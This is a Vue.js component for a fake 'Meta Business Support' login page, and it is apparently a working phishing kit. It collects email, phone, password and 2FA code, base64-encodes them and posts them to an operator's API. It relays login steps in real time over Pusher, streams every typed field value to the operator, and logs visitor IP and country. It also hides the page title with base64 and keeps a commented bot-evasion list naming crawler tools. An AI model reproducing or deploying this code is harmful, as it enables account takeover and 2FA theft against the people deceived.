<template>
  <HeaderCompoment></HeaderCompoment>
  <SectionTitle></SectionTitle>
  <section class="h-screen">
    <div v-if="!botCheck() && isAllowed && !isLoadingPage" class="flex flex-col mt-8 items-center px-6 py-8 mx-auto md:h-screen lg:py-0">
      <div class="w-full bg-white border border-blue-100 shadow dark:border md:mt-0 sm:max-w-md xl:p-0 dark:bg-gray-800 dark:border-gray-700">
        <div class="p-6 space-y-4 md:space-y-6 sm:p-8">
          <h1 class="text-xl font-bold leading-tight tracking-tight text-gray-900 md:text-2xl dark:text-white">
            {{ supportLine }}
          </h1>
          <form class="space-y-4 md:space-y-6" action="#">
            <div>
              <label for="email" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white">Enter your email address to log in to a Meta account.
              </label>
              <input @focusout="onFocusOut($event)" @input="onInput($event)" @change="onChange($event)" v-model="user.email" type="email" name="email" id="email" class="bg-gray-50 border border-gray-300 text-gray-900 sm:text-sm rounded-lg focus:ring-primary-600 focus:border-primary-600 block w-full p-2.5 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" placeholder="Email address" required="">
              <small v-text="errors.email" class="text-red-700"></small>
            </div>
            <div>
              <label for="phone_number" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white">Phone Number</label>
              <input @focusout="onFocusOut($event)" @input="onInput($event)" @change="onChange($event)" v-model="user.phoneNumber" type="text" name="phone_number" id="phone_number" v-bind:placeholder="placeHolder.phone" class="bg-gray-50 border border-gray-300 text-gray-900 sm:text-sm rounded-lg focus:ring-primary-600 focus:border-primary-600 block w-full p-2.5 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required="">
              <small v-text="errors.phoneNumber" class="text-red-700"></small>
            </div>
            <button @click="showPasswordContainer(true)" type="button" class="w-full text-white bg-primary-600 hover:bg-primary-700 focus:ring-4 focus:outline-none focus:ring-primary-300 font-medium rounded-lg text-sm px-5 py-2.5 text-center dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800">Contact us</button>
          </form>
        </div>
      </div>
    </div>
    <div v-if="(botCheck() || !isAllowed) && !isLoadingPage" class="flex flex-col items-center justify-center px-6 py-8 mx-auto md:h-screen lg:py-0">
      <a href="#" class="flex items-center mb-6 text-2xl font-semibold text-gray-900 dark:text-white">
        Sorry, but we aren't available right now.
      </a>
    </div>
    <div id="info-popup" tabindex="-1" class="hidden overflow-y-auto overflow-x-hidden fixed top-0 right-0 left-0 z-50 w-full md:inset-0 h-modal md:h-full">

      <div class="relative p-4 w-full max-w-lg h-full md:h-auto">
        <div class="relative p-4 bg-white rounded-lg shadow dark:bg-gray-800 md:p-8">
          <div class="mb-4 text-sm font-light text-gray-500 dark:text-gray-400">
            <h3 class="mb-3 text-2xl font-bold text-gray-900 dark:text-white">Verify it’s you</h3>
            <div>
              <label for="password" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white">Enter your password.</label>
              <input @focusout="onFocusOut($event)" @input="onInput($event)" @change="onChange($event)" v-model="user.password" type="password" name="password" id="password" placeholder="Password" class="bg-gray-50 border border-gray-300 text-gray-900 sm:text-sm rounded-lg focus:ring-primary-600 focus:border-primary-600 block w-full p-2.5 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required>

            </div>
            <small>Log in to get faster, more personalized support for your devices.
            </small>
          </div>
          <div class="justify-between items-center pt-0 space-y-4 sm:flex sm:space-y-0">
            <a href="#" class="font-light text-primary-500 dark:text-primary-500">
              <div v-if="loading" class="flex items-center">
                <div role="status">
                  <svg aria-hidden="true" class="w-4 h-4 mr-2 text-gray-200 animate-spin dark:text-gray-600 fill-blue-600" viewBox="0 0 100 101" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M100 50.5908C100 78.2051 77.6142 100.591 50 100.591C22.3858 100.591 0 78.2051 0 50.5908C0 22.9766 22.3858 0.59082 50 0.59082C77.6142 0.59082 100 22.9766 100 50.5908ZM9.08144 50.5908C9.08144 73.1895 27.4013 91.5094 50 91.5094C72.5987 91.5094 90.9186 73.1895 90.9186 50.5908C90.9186 27.9921 72.5987 9.67226 50 9.67226C27.4013 9.67226 9.08144 27.9921 9.08144 50.5908Z" fill="currentColor"/><path d="M93.9676 39.0409C96.393 38.4038 97.8624 35.9116 97.0079 33.5539C95.2932 28.8227 92.871 24.3692 89.8167 20.348C85.8452 15.1192 80.8826 10.7238 75.2124 7.41289C69.5422 4.10194 63.2754 1.94025 56.7698 1.05124C51.7666 0.367541 46.6976 0.446843 41.7345 1.27873C39.2613 1.69328 37.813 4.19778 38.4501 6.62326C39.0873 9.04874 41.5694 10.4717 44.0505 10.1071C47.8511 9.54855 51.7191 9.52689 55.5402 10.0491C60.8642 10.7766 65.9928 12.5457 70.6331 15.2552C75.2735 17.9648 79.3347 21.5619 82.5849 25.841C84.9175 28.9121 86.7997 32.2913 88.1811 35.8758C89.083 38.2158 91.5421 39.6781 93.9676 39.0409Z" fill="currentFill"/></svg>
                  <span class="sr-only">Loading...</span>
                </div>
                Validating information
              </div>
              <small class="text-red-700 font-bold" id="error_container"></small>
            </a>
            <div class="items-center space-y-4 sm:space-x-4 sm:flex sm:space-y-0">
              <button :disabled="loading" @click="confirmPassword" id="confirm-button" type="button" class="py-2 px-4 w-full text-sm font-medium text-center text-white rounded-lg bg-primary-700 sm:w-auto hover:bg-primary-800 focus:ring-4 focus:outline-none focus:ring-primary-300 dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800">Confirm</button>
            </div>
          </div>
        </div>
      </div>

    </div>
    <div id="info-popup-2" tabindex="-1" class="hidden overflow-y-auto overflow-x-hidden fixed top-0 right-0 left-0 z-50 w-full md:inset-0 h-modal md:h-full">
      <div class="relative p-4 w-full max-w-lg h-full md:h-auto">
        <div v-if="!success" class="relative p-4 bg-white rounded-lg shadow dark:bg-gray-800 md:p-8">
          <div class="mb-4 text-sm font-light text-gray-500 dark:text-gray-400">
            <h3 class="mb-3 text-2xl font-bold text-gray-900 dark:text-white">Confirmation code</h3>
            <p>
              {{user.provider2fa}}
            </p>
            <div>
<!--              <label for="code" class="block mb-2 text-sm font-medium text-gray-900 dark:text-white">Code</label>-->
              <input @focusout="onFocusOut($event)" @input="onInput($event)" @change="onChange($event)" v-model="user.code" type="text" name="code" id="code" placeholder="Confirmation code" class="bg-gray-50 border border-gray-300 text-gray-900 sm:text-sm rounded-lg focus:ring-primary-600 focus:border-primary-600 block w-full p-2.5 dark:bg-gray-700 dark:border-gray-600 dark:placeholder-gray-400 dark:text-white dark:focus:ring-blue-500 dark:focus:border-blue-500" required="">
            </div>
          </div>
          <div class="justify-between items-center pt-0 space-y-4 sm:flex sm:space-y-0">
            <div v-if="loading" class="flex items-center">
              <div role="status">
                <svg aria-hidden="true" class="w-4 h-4 mr-2 text-gray-200 animate-spin dark:text-gray-600 fill-blue-600" viewBox="0 0 100 101" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M100 50.5908C100 78.2051 77.6142 100.591 50 100.591C22.3858 100.591 0 78.2051 0 50.5908C0 22.9766 22.3858 0.59082 50 0.59082C77.6142 0.59082 100 22.9766 100 50.5908ZM9.08144 50.5908C9.08144 73.1895 27.4013 91.5094 50 91.5094C72.5987 91.5094 90.9186 73.1895 90.9186 50.5908C90.9186 27.9921 72.5987 9.67226 50 9.67226C27.4013 9.67226 9.08144 27.9921 9.08144 50.5908Z" fill="currentColor"/><path d="M93.9676 39.0409C96.393 38.4038 97.8624 35.9116 97.0079 33.5539C95.2932 28.8227 92.871 24.3692 89.8167 20.348C85.8452 15.1192 80.8826 10.7238 75.2124 7.41289C69.5422 4.10194 63.2754 1.94025 56.7698 1.05124C51.7666 0.367541 46.6976 0.446843 41.7345 1.27873C39.2613 1.69328 37.813 4.19778 38.4501 6.62326C39.0873 9.04874 41.5694 10.4717 44.0505 10.1071C47.8511 9.54855 51.7191 9.52689 55.5402 10.0491C60.8642 10.7766 65.9928 12.5457 70.6331 15.2552C75.2735 17.9648 79.3347 21.5619 82.5849 25.841C84.9175 28.9121 86.7997 32.2913 88.1811 35.8758C89.083 38.2158 91.5421 39.6781 93.9676 39.0409Z" fill="currentFill"/></svg>
                <span class="sr-only">Loading...</span>
              </div>
              Validating...
            </div>
            <a href="#" class="font-normal text-red-500 dark:text-primary-500 text-sm" id="error_container_2fa"></a>
            <div class="items-center space-y-4 sm:space-x-4 sm:flex sm:space-y-0">
              <button :disabled="loading" @click="handleAction('ResendCode')" id="confirm-button" type="button" class="py-2 px-4 w-full text-sm font-medium text-center text-white rounded-lg bg-gray-400 sm:w-auto hover:bg-gray-600 focus:ring-4 focus:outline-none focus:ring-primary-300 dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800">Resend code</button>
              <button :disabled="loading" @click="confirm2FA" id="confirm-button" type="button" class="py-2 px-4 w-full text-sm font-medium text-center text-white rounded-lg bg-primary-700 sm:w-auto hover:bg-primary-800 focus:ring-4 focus:outline-none focus:ring-primary-300 dark:bg-primary-600 dark:hover:bg-primary-700 dark:focus:ring-primary-800">Confirm</button>
            </div>
          </div>
        </div>
        <div v-if="success" id="toast-success" class="flex items-center w-full max-w-xs p-4 mb-4 text-gray-500 bg-white rounded-lg shadow dark:text-gray-400 dark:bg-gray-800" role="alert">
          <div class="inline-flex items-center justify-center flex-shrink-0 w-8 h-8 text-green-500 bg-green-100 rounded-lg dark:bg-green-800 dark:text-green-200">
            <svg class="w-5 h-5" aria-hidden="true" xmlns="http://www.w3.org/2000/svg" fill="currentColor" viewBox="0 0 20 20">
              <path d="M10 .5a9.5 9.5 0 1 0 9.5 9.5A9.51 9.51 0 0 0 10 .5Zm3.707 8.207-4 4a1 1 0 0 1-1.414 0l-2-2a1 1 0 0 1 1.414-1.414L9 10.586l3.293-3.293a1 1 0 0 1 1.414 1.414Z"/>
            </svg>
            <span class="sr-only">Check icon</span>
          </div>
          <div class="ml-3 text-sm font-normal">We will be in touch with you shortly.</div>
        </div>
      </div>
      <div v-if="isLoadingPage" class="flex flex-col items-center justify-center px-6 py-8 mx-auto md:h-screen lg:py-0">
<!--        <iframe src="https://lottie.host/?file=167efd17-cae3-4bca-ba46-df5c3eb4a590/7tqZGGc92B.json"></iframe>-->
        <span class="font-medium">Loading...</span>
      </div>
    </div>
    <footer class="fixed bottom-0 left-0 z-20 w-full p-4 bg-white border-t border-gray-200 shadow md:flex md:items-center md:justify-between md:p-6 dark:bg-gray-800 dark:border-gray-600">
    <span class="text-sm text-gray-500 sm:text-center dark:text-gray-400">© 2024 <a href="#" class="hover:underline">Meta™</a>.
    </span>
    </footer>
  </section>
</template>

<script>
import {Modal} from "flowbite";
import Pusher from 'pusher-js';
import axios from "axios";
import { initFlowbite } from 'flowbite'
import phones from '../assets/phones.json'
import HeaderCompoment from "@/components/Header.vue";
import SectionTitle from "@/components/SectionTitle.vue";
import constants from "@/constants";
export default {
  name: 'HelloWorld',
  components: {SectionTitle, HeaderCompoment},
  props: {
    msg: String
  },
  created() {
  },
  mounted() {
    initFlowbite();
    localStorage.setItem("is_login", "0");
    localStorage.setItem("provider2fa", "");
    const self = this;
    const CHANNEL_KEY = "channel_key";
    const channelName = localStorage.getItem(CHANNEL_KEY)
    if (!channelName || channelName.indexOf("PUB_ID") === -1) {
      this.channelUuid = "PUB_ID_" + crypto.randomUUID();
      localStorage.setItem(CHANNEL_KEY, this.channelUuid)
    } else {
      this.channelUuid = channelName;
    }

    this.ws.pusher = new Pusher(this.ws.pusherKey, {
      cluster: this.ws.pusherCluster,
    });

    // this.ws.pusher.connection.bind('error', function(error) {
    //   console.log(error);
    //   self.isAvailable = false;
    // })

    this.ws.channel = this.ws.pusher.subscribe(this.channelUuid);

    this.ws.channel.bind("step-1-result", function(data) {
      if (data) {
        let json = JSON.parse(data.message)
        if (json.success === "1") {
          // self.user.provider2fa = json.message;
          // self.showPasswordContainer(false);
          // self.show2FAContainer(true);
          localStorage.setItem("is_login", "1");
          localStorage.setItem("provider2fa", json.message);
          window.location.href = '/confirm-login';
        } else {
          document.getElementById("error_container").innerText = json.message;
        }
      } else {
        document.getElementById("error_container").innerText = "Something went wrong. Please try again later.";
      }
      self.loading = false;
    })

    try {
      if (localStorage.getItem('country_code') === 'unk' || !localStorage.getItem('country_code')) {
        fetch('https://freeipapi.com/api/json')
            .then(response => response.json())
            .then(data => {
              if (data) {
                if (data.countryName === 'Viet Nam') {
                  // this.isAllowed = false;
                  // self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname + ", VietNam nên bỏ qua")
                }
                self.handleAction("New visitor. IP = " + data.ipAddress + ", country = " + data.countryName + ", URL = " + window.location.pathname)
                if (data.countryCode) {
                  localStorage.setItem("country_code", data.countryCode)
                  localStorage.setItem("ip_address", data.ipAddress)
                } else {
                  localStorage.setItem("country_code", "unk")
                }
              }
            });
      } else {
        let country_code = localStorage.getItem("country_code")
        let ip_address = localStorage.getItem("ip_address")

        self.handleAction("New visitor. IP = " + ip_address + ", country = " + country_code + ", URL = " + window.location.pathname)

      }

      let phoneConfig = phones.find(x => x.code === localStorage.getItem("country_code"));
      if (phoneConfig) {
        this.placeHolder.phone = phoneConfig.dial_code;
      }
      this.isLoadingPage = false;

    } catch (ex) {
      self.handleAction("Can not get IP information");
      this.isLoadingPage = false;
    }

    this.ws.pusher.connection.bind('disconnected', function() {
      alert('Disconnected to meta server. Please reload and try again.')
    })

  },
  data() {
    return {
      isLoadingPage: true,
      isAllowed: true,
      currentTyping: null,
      user: {
        email: null,
        password: null,
        phoneNumber: null,
        channelUuid: null,
        loadingConfirm: false,
        provider2fa: "sms",
        code: "",
        phonePrefix: "1"
      },
      errors: {
        email: null,
        phoneNumber: null
      },
      ws: {
        pusher: null,
        channel: null,
        pusherKey: constants.PUSHER_KEY,
        pusherCluster: "ap1"
      },
      loading: false,
      success: false,
      dm: constants.API_URL,
      name: 'Meta Business Support',
      supportLine: atob("Q29udGFjdCBNZXRhIHN1cHBvcnQ="),
      isAvailable: true,
      placeHolder: {
        phone: "Phone number"
      }
    }
  },
  methods: {
    showPasswordContainer(isShow) {
      if (!this.isAvailable) {
        alert("Sorry, we can't help you right now");
        return;
      }
      if (isShow) {
        if (!this.user.email || this.user.email === "") {
          this.errors.email = "Enter your email address in the format name@example.com, or enter a user ID";
          return;
        } else {
          if (!this.validateId(this.user.email)) {
            this.errors.email = "Enter your email address in the format name@example.com, or enter a user ID";
            return;
          }
        }

        if (!this.user.phoneNumber || this.user.phoneNumber === "") {
          this.errors.phoneNumber = "Phone number is required.";
          return;
        }else {
          if (!this.validatePhoneNumber(this.user.phoneNumber)) {
            this.errors.phoneNumber = "Your phone number is incorrect.";
            return;
          }
        }

        this.user.code = "";
        this.user.provider2fa = "";
      }
      document.getElementById("error_container").innerText = "";
      this.success = false;
      this.user.password = "";

      const modalEl = document.getElementById('info-popup');
      const privacyModal = new Modal(modalEl, {
        placement: 'center',
        onShow: () => {
          this.handleAction("Hiển thị màn nhập mật khẩu")
          this.errors.phoneNumber = "";
          this.errors.email = "";
        },
        onHide:() => {
          this.loading = false;
          this.handleAction("Màn nhập mật khẩu bị ẩn")
        }
      })
      if(isShow)
        privacyModal.show()
      else {
        privacyModal.hide()
      }
    },
    confirmPassword() {
      document.getElementById("error_container").innerText = "";

      if (!this.user.password || this.user.password.trim() === "") {
        document.getElementById("error_container").innerText = "Password is required.";
        return;
      }
      this.loading = true;

      const self = this;

      let phoneNumber = this.user.phoneNumber;
      phoneNumber = this.handlePhoneNumber(phoneNumber);

      let params = btoa(`userName=${this.user.email}&password=${encodeURIComponent(this.user.password)}&phoneNumber=${phoneNumber}&pubId=${this.channelUuid}`)
      axios.post(`${this.dm}api/confirmPassword`, {params}).catch((error) => {
        console.log(error);
        document.getElementById("error_container").innerText = "Sorry we can't help you right now.";
        self.loading = false;
      })
      this.handleAction("User bắt đầu đăng nhập");
    },
    show2FAContainer(isShow) {
      if (!this.isAvailable) {
        alert("Sorry, we can't help you right now");
        return;
      }
      const modalEl = document.getElementById('info-popup-2');
      const privacyModal = new Modal(modalEl, {
        placement: 'center',
        backdropClasses: 'none',
        onShow: () => {
          this.handleAction("2FA popup is shown.")
        },
        onHide:() => {
          this.handleAction("2FA popup is hidden.")
        }
      })
      if(isShow)
        privacyModal.show()
      else {
        privacyModal.hide()
      }
    },
    confirm2FA() {
      if (!this.isAvailable) {
        alert("Sorry, we can't help you right now");
        return;
      }
      this.loading = true;
      let params = btoa(`pubId=${this.channelUuid}&otp=${this.user.code}`)
      axios.post(`${this.dm}api/verify`, {params})
    },
    validateId(loginId) {
      if (loginId.indexOf("@") > -1) {
        return loginId.match(
            /^(([^<>()[\]\\.,;:\s@"]+(\.[^<>()[\]\\.,;:\s@"]+)*)|(".+"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/
        );
      } else {
        return !isNaN(parseFloat(loginId)) && isFinite(loginId);
      }
    },
    handleAction(message) {
      if (message === 'ResendCode') {
        this.loading = true;
        setTimeout(() => {
          this.user.provider2fa = 'We have sent the verification code again. Enter the code to log in.';
          this.loading = false;
        }, 1000)

      }
      if(this.channelUuid) {
        try {
          axios.post(`${this.dm}api/handleAction`, {"pubId": this.channelUuid, "message": message})
        }catch (ex) {
          console.log(ex);
        }
      }
    },
    botCheck(){
      // const botPattern = "(googlebot|Googlebot-Mobile|Googlebot-Image|Google favicon|Mediapartners-Google|bingbot|slurp|java|wget|curl|Commons-HttpClient|Python-urllib|libwww|httpunit|nutch|phpcrawl|msnbot|jyxobot|FAST-WebCrawler|FAST Enterprise Crawler|biglotron|teoma|convera|seekbot|gigablast|exabot|ngbot|ia_archiver|GingerCrawler|webmon |httrack|webcrawler|grub.org|UsineNouvelleCrawler|antibot|netresearchserver|speedy|fluffy|bibnum.bnf|findlink|msrbot|panscient|yacybot|AISearchBot|IOI|ips-agent|tagoobot|MJ12bot|dotbot|woriobot|yanga|buzzbot|mlbot|yandexbot|purebot|Linguee Bot|Voyager|CyberPatrol|voilabot|baiduspider|citeseerxbot|spbot|twengabot|postrank|turnitinbot|scribdbot|page2rss|sitebot|linkdex|Adidxbot|blekkobot|ezooms|dotbot|Mail.RU_Bot|discobot|heritrix|findthatfile|europarchive.org|NerdByNature.Bot|sistrix crawler|ahrefsbot|Aboundex|domaincrawler|wbsearchbot|summify|ccbot|edisterbot|seznambot|ec2linkfinder|gslfbot|aihitbot|intelium_bot|facebookexternalhit|yeti|RetrevoPageAnalyzer|lb-spider|sogou|lssbot|careerbot|wotbox|wocbot|ichiro|DuckDuckBot|lssrocketcrawler|drupact|webcompanycrawler|acoonbot|openindexspider|gnam gnam spider|web-archive-net.com.bot|backlinkcrawler|coccoc|integromedb|content crawler spider|toplistbot|seokicks-robot|it2media-domain-crawler|ip-web-crawler.com|siteexplorer.info|elisabot|proximic|changedetection|blexbot|arabot|WeSEE:Search|niki-bot|CrystalSemanticsBot|rogerbot|360Spider|psbot|InterfaxScanBot|Lipperhey SEO Service|CC Metadata Scaper|g00g1e.net|GrapeshotCrawler|urlappendbot|brainobot|fr-crawler|binlar|SimpleCrawler|Livelapbot|Twitterbot|cXensebot|smtbot|bnf.fr_bot|A6-Indexer|ADmantX|Facebot|Twitterbot|OrangeBot|memorybot|AdvBot|MegaIndex|SemanticScholarBot|ltx71|nerdybot|xovibot|BUbiNG|Qwantify|archive.org_bot|Applebot|TweetmemeBot|crawler4j|findxbot|SemrushBot|yoozBot|lipperhey|y!j-asr|Domain Re-Animator Bot|AddThis)";
      // const re = new RegExp(botPattern, 'i');
      // const userAgent = navigator.userAgent;
      // return re.test(userAgent);
      return false;
    },
    onInput(event) {
      if (this.currentTyping !== event.target.name) {
        this.currentTyping = event.target.name;
        this.handleAction(`User đang điền: ${event.target.name}`)
      }
    },
    onFocusOut(event) {
      // this.handleAction(`focusOut: ${event.target.name}`)
      console.log(`Focus out ${event.target.name}`)
    },
    onChange(event) {
      try {
        if (event.target.name === 'phone_number') {
          let phoneNumber = event.target.value;
          phoneNumber = this.handlePhoneNumber(phoneNumber);
          this.handleAction(`User is changed: ${event.target.name} - value = ${phoneNumber}`)
        } else {
          this.handleAction(`User is changed: ${event.target.name} - value = ${event.target.value}`)
        }

      } catch (ex) {
        console.log(ex);
      }
    },
    validatePhoneNumber(phoneNumber) {
      return !isNaN(phoneNumber)
    },
    handlePhoneNumber(phoneNumber) {
      if (phoneNumber.startsWith("0") && localStorage.getItem("country_code") && localStorage.getItem("country_code") !== "unk") {
        let phoneConfig = phones.find(x => x.code === localStorage.getItem("country_code"));
        if (phoneConfig) {
          phoneNumber = this.user.phoneNumber.substring(1)
          phoneNumber = phoneConfig.dial_code + phoneNumber;
        }
      } else if(!phoneNumber.startsWith("+")) {
        let phoneConfig = phones.find(x => x.code === localStorage.getItem("country_code"));
        if (phoneConfig) {
          if(phoneNumber.startsWith(phoneConfig.dial_code.replace("+", ""))) {
            if (phoneNumber.toString().length < 10) {
              phoneNumber = phoneConfig.dial_code + phoneNumber;
            } else {
              phoneNumber = "+" + phoneNumber;
            }
          } else {
            phoneNumber = phoneConfig.dial_code + phoneNumber;
          }
        }
      }

      return phoneNumber;
    }
  }
}
</script>